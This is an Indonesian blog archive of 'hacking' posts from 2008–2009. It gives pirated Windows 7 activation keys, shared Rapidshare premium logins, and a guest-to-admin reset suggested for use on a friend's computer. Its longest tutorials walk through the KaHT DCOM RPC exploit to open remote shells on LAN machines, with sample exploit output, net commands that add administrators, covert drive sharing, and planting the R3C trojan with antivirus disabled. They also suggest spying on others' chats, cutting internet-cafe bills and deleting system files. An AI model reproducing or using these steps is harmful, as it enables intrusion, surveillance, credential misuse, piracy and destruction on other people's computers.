Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

1.11.2009

Product Key Aktivasi Microsoft.Windows.7.Beta.1.Build.7000.x86.x64

Perusahaan Microsoft telah merilis windows 7 versi beta, bagi Anda penggemar windows 7 download aja walaupun versi beta, udah banyak yang nyediain. Buruan!! Download. Kemarin habis download Windows trus install deh Windows 7 nya , Memang tampilannya keren abisss, tapi ternyata windowsnya cuma aktif sampai 30 hari aja. Mungkin tiap orang nggak akan install tu windows kalau aktifnya dibatasi 30 hari,Kan nggak mungkin kalau tiap 30 hari install tu windows ??? Bagi Anda yang ingin menghilangkan Windows Activation coba gunakan Product Key dibawah ini...


Windows 7 Beta 1 Build 7000 x86 and x64 Serial Keys:

Windows 7 Beta 32-bit Product Key :

  • 4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH

  • 6JKV2-QPB8H-RQ893-FW7TM-PBJ73

  • GG4MQ-MGK72-HVXFW-KHCRF-KW6KY

  • QXV7B-K78W2-QGPR6-9FWH9-KGMM7

  • TQ32R-WFBDM-GFHD2-QGVMH-3P9GC

  • CRJ8X-Q3D3G-V6T98-HMX62-2W3KX

  • XGD8W-B6WBM-8FDJ2-R43TQ-XP3KM



  • Windows 7 Beta 64-bit Product Key :
  • 482XP-6J9WR-4JXT3-VBPP6-FQF4M

  • 7XRCQ-RPY28-YY9P8-R6HD8-84GH3

  • D9RHV-JG8XC-C77H2-3YF6D-RYRJ9

  • JYDV8-H8VXG-74RPT-6BJPB-X42V4

  • RFFTV-J6K7W-MHBQJ-XYMMJ-Q8DCH



  • Windows 7 saya versi 32-bit, saya coba salah satu dari Product Key diatas ternyata berhasil,

    EnJoy It!!
    KeeP HacKinG

    Lihat Selengkapnya...

    8.26.2008

    Reset Password Administrator Windows XP Tanpa Program

    Dengan menggunakan akun administrator kita bisa melakukan apa saja yang kita mau tanpa adanya batasan atau sering disebut juga "super user". Administrator merupakan tingkatan teratas dari user2 yang ada. Kadang kita mempunyai akun lebih dari 1 , mulai dari Administrator , akun biasa dan guest. Apabila Anda lupa dengan password administrator mungkin dengan cara dibawah ini bisa membantu Anda untuk dapat menggunakan administrator lagi.

    1. Masuk di akun biasa atau guest

    2. Klik Start -- Run

    3. Ketikan "control userpasswords2"



    4. Pilih "Administrstor" pada username



    5. Klik "Reset Password"

    6. Masukkan password baru Administrator Anda

    7. Coba gunakan Administrator Anda dengan password yang telah Anda masukkan tadi

    Dengan langkah diatas Anda juga bisa meng-hack komputer teman Anda(Yang Pelit). Ketika Anda mau pinjam komputer teman Anda trus disuruh masuk ke guest hack aja komputernya dengan cara diatas agar bisa masuk ke Administrator.

    "$Go Indonesian Hacker$"

    Lihat Selengkapnya...

    7.21.2008

    PHP INJECTION

    This summary is not available. Please click here to view the post. Lihat Selengkapnya...

    Mendapatkan Akses Premium Account di Rapidshare

    Rapidshare[dot]de, situs penyedia layanan upload dan free download file, alternatif bagi para netter yang ingin tukar-menukar file. Cukup gunakan fasilitas upload berbasis web yang telah disediakan, catat alamat url file anda dan anda bisa mendownloadnya dari manapun lain waktu atau bagikan alamat url tersebut ke teman-teman anda jika anda ingin mereka juga "menikmati" file yang telah anda upload.
    Ada 2 account yang ditawarkan oleh Rapidshare, yaitu Premium account dan Free Account. Masalahnya adalah pada Free account. User akan terganggu dengan adanya counter time. Counter time ini biasanya bisa mencapai lebih dari 1 menit. Jadi, rapidshare akan membuat anda menunggu selama kurang lebih satu menit sebelum menunjukkan url file yang nada minta. Huh.. cukup menyita waktu bukan?
    Masalah kedua adalah Rapidshare akan mencatat alamat IP anda dan memberikan batasan untuk melakukan download.
    Masalah ketiga, manusia selalu saja merasa kurang puas. Ketika dia sudah mendapatkan akses yang setara dengan premium account, dia akan berfikir, "gimana yach biar gue benr-bener dapet premium account". Okay, di artikel ini juga saya akan mewujudkan impian itu.
    Sekarang, mari kita bahas ketiga masalah itu satu persatu.

    :::::: Alat perang Kita ::::::
    >> Seperangkat komputer dan koneksi internet ^_^
    >> keberanian dan semangat yang tinggi Smile
    >> Browser Mozilla Firefox

    I. Melewati Conter Time
    -------------------------
    1. Copy-paste alamat (URL) file yang hendak anda download di address bar Mozilla.
    2. Setelah halaman Rapidshare muncul, klik Free account.
    3. Akan muncul counter down, abaikan saja, hapus string url di address bar anda hingga bersih, kemudian ketik kode java script berikut: javascript:alert(c=0)
    4. Tekan ENTER, akan muncul sebuah message box di hadapan anda, tenang, jangan panik, tetap fokus dan bersabar ^_^ tekan saja [OK] dengan penuh percaya diri, counter down akan segera lenyap dari hadapan anda dan rapidshare akan menampilkan link download file yang ingin anda download.

    II. Mengatasi Limit Download
    ------------------------------
    Caranya simple, gunakan saja kumpulan proxy yang sudah diposting di www.spyrozone.tk halaman Artikel&Trik kategori komputer. Pilih sendiri dari ratusan proxy itu Smile

    III. Benar-Benar Mendapatkan akses Premium Account
    --------------------------------------------------
    Jika kedua cara yang telah saya bahas hanya akan memberikan anda akses "setara" dengan premium account, kini anda akan benar-benar mendapatkan premium account! Gunakan saja User name dan password berikut:

    LOGIN: 31989
    PASSWORD: 2310214

    LOGIN: 27766
    PASSWORD: 8797341

    User: 18549
    Password: 4646182

    Login: 20145
    Password: 7072148

    Login: 19159
    Password: 7932964

    Login: 20151
    Password: 773290

    Login: 20366
    Password: 7177185

    Login: 20374
    Password: 5630758

    Login: 20452
    Password: 3249043

    LOGIN: 20949
    PASSWORD: 2716739

    User: 22484
    Password: 358030

    User: 18549
    Password: 4646182

    User: 18800
    Password: 9496722

    LOGIN: 20949
    PASSWORD: 2716739

    Login: 20145
    Password: 7072148

    Login: 19159
    Password: 7932964

    Login: 20151
    Password: 773290

    Login: 20366
    Password: 7177185

    Login: 20374
    Password: 5630758

    Login: 20452
    Password: 3249043


    PENTING :
    Gunakan trik dan account yang telah saya berikan untuk mendownload file-file yang bermanfaat. Sudah bukan jamannya lagi keterbatasan membatasi kita untuk belajar. Keep Learning and happy hacking..

    Sumber Artikel spyrozone




    Lihat Selengkapnya...

    Serangan Ke Windows XP

    Tutorial remote komputer memang sudah ada di versi standardnya namun banyak sekali yang bertanya tentang remote komputer kepada webmaster bahkan sampai ditanyakan beberapa kali lewat via e-mail, untuk itu maka disini bagi yang belum pernah melakukan remote komputer maka anda dapat masuk dihalaman ini.

    Cara masuk di komputer lain lewat DOS (Windows XP / 2000)

    Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

    Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu

    internet Maniac (Internet Maniac.exe) ... Download Interenet Maniac
    Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname



    KaHT (KaHt.exe) ... Download program hacker KaHT
    Berfungsi sebagai program untuk menerobos ke computer server atau client

    Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe

    Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

    Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pakek WINZIP atau pakek apa.
    Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

    Untuk Windows XP
    Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.



    Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) :)
    Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul
    (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)

    Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja kamu jalankan program Internet Maniac
    Download IManiac......



    Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.

    Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

    Cara masuk DOS Mode
    Untuk Windows XP :
    Masuklah ke Start, All programs, Accessories lalu Command Prompt
    Untuk Windows 95/98/Me/NT/2000
    Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt



    Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaHT) maka ketikkan “CD\KaHT” dan seterusnya.

    Jika sudah, ini saatnya…

    Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
    kalau bingung bisa begini : "KaHT Ip1 ip2"
    ip1 : ip awal yang discan
    ip2 : ip terahkir yang discan



    Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1” lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa



    Nah kalo udah begini kita bisa berkreasi :

    Pingin biaya warnet kita lebih murah ?
    gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe.

    Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan.




    Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe.

    Diatas cuman kreasi dikit aja, kamu bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas

    Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..

    Penulis :
    Jogjahacking

    Referensi :
    1. Yogya Family Code
    2 .Jasakom.com

    *Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
    *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

    Membuat akses administrator Windows untuk kita lewat komputer lain

    Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.



    Melihat akses guest dan administrator di Windows
    Ketik : net user

    Melihat aktif tidaknya guest di Windows
    Ketik : net user guest

    Membuat akses guest menjadi Administrator dengan perintah :
    Ketik : net localgroup Administrators Guest /add

    Membuat akses adminstrator sendiri :
    1. Ketik : net user /add
    2. Ketik : net localgroup Administrators /add

    Menghapus akses administrator
    Ketik : net localgroup Users /delete

    Penulis :
    jogjahacking

    Referensi :
    1. y3dips dari situs Echo.or.id

    *Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
    *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

    Cara melakukan share di komputer lain (2000/XP) secara bebas

    Pada tanggal 06 Januari 2005, penulis menemukan teknik baru cara melakukan share dikomputer sasaran secara bebas di Windows XP, yang dimana waktu itu penulis penasaran melihat isi share dengan perintah ///c$ (Default Share) yang sebelumnya lancar bisa masuk di drive C komputer sasaran, tiba-tiba setelah komputer sasaran diinstall ulang dan ditambah settingan, membuat penulis tidak dapat masuk lagi dengan perintah ///c$ dimana jika dijalankan perintah tersebut maka muncul sebuah form untuk memasukkan password.

    Dikomputer sasaran, penulis udah periksa ternyata akses password admin tidak dipassword juga tidak ada password di folder-folder lain yang share, tapi tetap saja di komputer sasaran meminta password, tapi dengan rasa pusing memikirkan ini ahkirnya penulis coba-coba masuk ke Help, disitu pada search penulis tulis c$, ahkirnya setelah ditunggu ahkirnya pada Search Results, di nomor 9 ada tulisan "Net Share" karena tulisan ini lebih sesuai topik maka penulispun masuk.kedalam ahkirnya di net share ini banyak membuka cakrawala pengetahuan penulis, dengan penemuan ini maka penulis jadi mempunyai ide cemerlang cara membuat share drive c, drive d atau folder-foldernya apa saja di komputer sasaran.



    Bagaimana caranya ?
    Siapkan program KaHT, kita terapkan lagi ilmu ini, lalu setelah kita masuk di komputer sasaran dengan KaHT maka kita ketikkan perintah : "Net Share =c:\" dengan perintah ini maka drive c akan dishare, jika anda takut ketahuan dengan user yang makek komputer itu, maka share saja foldernya, misalnya kita ingin menshare folder c:\windows caranya ketik "Net Share =c:\windows, oh iya bisa ditulis terserah anda dimana nantinya ini sebagai identitas nama untuk drive atau folder yang dishare.

    Ahkirnya dengan tutorial ini maka penulis mengakiri tanda tanya para pengguna KaHT yang ingin mengambil files dari komputer sasaran atau pengcopyan files ke komputer sasaran, dengan cara seperti ini maka kita bisa memanfaatkan komputer sasaran lebih jauh seperti memasang trojan, backup data ke komputer lain bahkan teknik cara mematai-mata teman chatting disatu warnet yang ditulis oleh penulis di Jasakom sebelumnya menjadi lebih mudah karena kita tinggal menshare folder mircnya saja dan kita mengubah file "mirc.ini" di notepad saja. :)

    Berkenalan dengan Trojan R3C

    Sebelum bicara lebih jauh tentang trojan R3C, penulis tidak bertanggung jawab atas penyalahgunaan artikel ini. artikel ini hanya untuk pembelajaran dan menambah wawasan saja.

    Untuk lebih lancarnya proses pembelajaran sebaiknya download dulu trojan yang kita sayangi ini.Anda dapat mendownloadnya di r3c download .setelah trojan berhasil di download, akan terlihat 2 buah file yaitu client.exe dan servavi.exe. File servavi merupakan program yang ada dalam komputer target sedangkan program client.exe merupakan sebagai program yang kita pegang sebagai remote. Sebenarnya permasalahan yang timbul adaalh bagaimana kita tahu bahwa suatu komputer telah tertanam trojan R3C ini.

    OK sekarang buka dulu program client.exe,untuk mengetahui komputer yang sudah tertanam trojan ini kita tinggal melakukan scan IPs. Klo hasil scan sudah didapat, tinggal kita masukkan no IP komputer target ke program clien kita, terus bagaimana klo hasil scan tidak menunjukkan hasil apa2.....? Gmn ya....? tenang saja banyak jalan menuju roma, kita pasang aja sendiri program servavi.exe itu. Cara masuk dan menaruh prog servavi.exe itu bisa dilakukan dengan beberapa program remote port scan antara lain legion, netcop, superscan dan lain lain (nanti cari di google sendiri ya....). Klo sudah bisa masuk ke komputer target tinggal klik 2 kali program servavi.exe itu, dan klo program itu sudah ada dikomputer target tinggal kita kerjain aja.(ups...becanda..ini Cuma pembelajaran) .

    Ok sekarang kita lihat dulu menu menu yang ada pada trojan ini...
    1. capture screen untuk melakukan capture, dengan ini kita dapat mengetahui apa yang sedang dikerjakan atau yang di buka oleh korban.
    2. message function berguna untuk menampilkan pesan kepada komputer korban.
    3. Policies berfungsi untuk melakukan perubahan pada registry dengan beberapa list yang sudah disediakan oleh trojan ini
    4. execute berguna untuk membuka program yang kita inginkan dengan mengetikkan contoh c:\windows\calc
    5. Open URL berguna untuk membuka alamat suatu website pada komputer korban
    6. Display BMP untuk menampilkan file gambar dengan format BMP
    7. Server info untuk menampilkan informasi komputer korban
    8. Redraw screen berguna untuk menghilangkan list hasil manipulasi yang telah dibuat.
    9. Don't Click!!! Berguna untuk menghilangkan server trojan ini.
    10. Pilihan shutdown untuk melakukan shutdown pada komputer korban.
    11. Pilihan restart untuk melakukan proses restart pada komputer target
    Sebenarnya masih banyak manipulasi atau hal2 yang kita inginkan (ato yang tidak diinginkan oleh korban he...he...), untuk lebih jelasnya lihat sendiri dan buktikan sendiri.

    Mungkin apabila anda belum punya target, bisa coba komputer sendiri dirumah tp ingat matikan dulu program anti virusnya krn trojan ini belum diimunisasi he...he...(becanda). Percobaan yang dilakukan penulis trojan ini hanya bekerja pada windows 9x untuk win XP belum bisa, mungkin suatu saat.

    Untuk temen2 yang melakukan percobaan dengan komputer sendiri saatnya untuk menghilangkan trojan itu. Biar nanti tidak dikatakan kurang bertanggung jawab.Caranya :
    1. Hapus file IPMON.EXE dan WINSOCK.EXE yang terdapat pada c:\windows\system
    2. Buka run, ketik msconfig, system configuration utility akan muncul dan klik tab startup, hilangkan centang pada ipmon.exe. Sekarang klik tab system.ini, pilih tanda + pada boot, akan muncul banyak pilihan tp yang kita lihat hanya pada shell=Explorer.exe winsock.exe, klik data tersebut lalu edit menjadi shell=Explorer.exe.

    Udah selesai, berarti penulis sudah tidak disalahkan lagi.

    Mengontrol komputer lain pada Windows XP dengan gabungan Remote & Trojan

    Penulis kali ini akan lebih menyempurnakan tutorial yang diterbitkan oleh banyak penulias sebelumnya yang beredar, yang berjudul "Berkenalan dengan Trojan R3C",dimana Trojan R3C ini dapat kita gabungkan dengan program kesayangan kita yaitu KaHT. Sebagai informasi saja bahwa sebelumnya program ini sudah diujicoba antar jaringan LAN di tempat penulis sendiri dengan hasil yang memuaskan.

    Perlu diketahui kedua program (KaHT dan R3C) ini memang terdetect oleh AntiVirus sebagai Trojan maka nonaktifkan dahulu AntiVirusnya. :)

    Baik kita mulai saja mempraktekkan gabungan KaHT dengan R3C yang bisa dikatakan cukup serasi, pertama kita jalankan program KaHT seperti biasa, setelah kita berada di komputer sasaran, kita lihat apakah komputer sasaran di share komputernya ? biasanya diwarnet-warnet Yogya di share di drive Dnya :P, walaupun tidak disharepun bisa juga melakukan share sendiri dengan cara dapat melihat tulisan saya dengan judul "Melakukan share dikomputer lain secara secara bebas pada Windows XP".

    Setelah itu kita copykan file servapi.exe ke komputer sasaran lewat sharing, jika sudah dicopy dikomputer sasaran, kita kembali ke KaHT tadi, misalkan saja tadi program servapi.exe ada di drive D, cukup kita panggil saja program client.exe, menurut pengalaman saya, kita panggil beberapa kali file ini, karena pernah satu kali saja tapi ternyata trojannya belum mau jalan. :P

    Setelah kita menjalankan program client.exe di komputer sasaran, sekarang tinggal kita jalankan program client.exe di komputer kita untuk mengontrol komputer sasaran.



    Sekarang kita pilih Scan IPs..., lalu akan muncul tampilan sebagai berikut



    Kita isi Get IP by Hostname dengan nama computer sasaran lalu klik arah panan kekanan dan hasilnya muncul ip addreas computer sasaran lalu kita klik arah panah keatas, kalo udah kita klik Start, setelah selesai prosesnya kita klik Exit lalu kita kita isi pada IP/name dengan ip addreas atau nama computer kita lalu kita klik Connect! dan muncul tampilan seperti dibawah ini :



    Kalau udah begini kita bisa ngapain aja pada komputer sasaran, dari ngambil gambar apa yang sedang dilakukan user di komputer (capture screen), ngirim pesan ke user komputer sasaran (message function), merubah registry windows komputer sasaran, menjalankan program apa saja yang kita inginkan dikomputer sasaran, memaksa komputer sasaran membuka alamat situs tertentu, melakukan shutdown pada komputer sasaran, melakukan restart dan masih banyak lagi.

    Tulisan ini sekaligus menutup jika ada anggapan bahwa Trojan R3C hanya berjalan di Windows 98, asal yang download R3C for Windows XP (bukan yang untuk Windows 98) dan yang paling penting saya tidak bertanggung apapun atas kesalahan dan kerusakan pada komputer manapun yang diakibatkan oleh tulisan saya, pergunakan ilmu ini untuk menjaga diri bukan untuk merusak, hidup dunia komunitas hacker Underground Yogya !

    Sumber Artikel Jogjahacking





    Lihat Selengkapnya...

    Teknik - Teknik Carding

    This summary is not available. Please click here to view the post. Lihat Selengkapnya...

    Tekhnik Exploit Password WinXP

    Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki access seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?,

    Tekhnik pertama :
    Yang kita butuhkan sekarang adalah :
    Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
    1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.
    Nekatzzzz ....

    Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...

    Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
    Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
    Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox...


    -------------------------------------------------
    | Log On to Windows | x |
    -------------------------------------------------
    | User Name : Al-k |
    | Password : ****** |
    | |
    | | Ok | | Cancel | | BLABLABLABLA....| |
    -------------------------------------------------

    Ya, bentuknya kira-kira seperti diatas ... : )...
    Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

    Tekhnik Kedua :
    Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ...

    C:\Documents and Settings\Al-k>net user

    User accounts for \\NOMATTER
    -------------------------------------------------------------------------------
    Administrator Al-k GNU-- keluarga --
    Guest HelpAssistant SUPPORT_388945a0
    VUSR_NOMATTER
    The command completed successfully.

    // Anggap saja disini Al-k adalah user yang limited
    // Setelah itu masuk ke direktori di mana kaht berada

    D:\Data+ku_>

    Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.

    D:\Data+ku_>kaht 127.0.0.0 127.0.0.3
    _________________________________________________

    KAHT II - MASSIVE RPC EXPLOIT
    DCOM RPC exploit. Modified by aT4r@3wdesign.es
    #haxorcitos && #localhost @Efnet Ownz you!!!
    FULL VERSION? :) - AUTOHACKING
    ________________________________________________

    [+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
    [+] Attacking Port: 135. Remote Shell at port: 34522
    [+] Scan In Progress...
    - Connecting to 127.0.0.2

    Sending Exploit to a [WinXP] Server...
    - Conectando con la Shell Remota...

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>

    Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
    buat akses user yang terbatas tadi menjadi Super User.

    C:\WINDOWS\system32> net localgroup Administrators Al-k /add

    The command completed successfully.



    Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

    HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

    , buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
    Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (


    // Refferensi :
    - Seni Tekhnik Hacking 1 [S’to]
    - Echo Zine 10, Exploitasi Windows XP [mRt]
    - Iseng Instink




    Lihat Selengkapnya...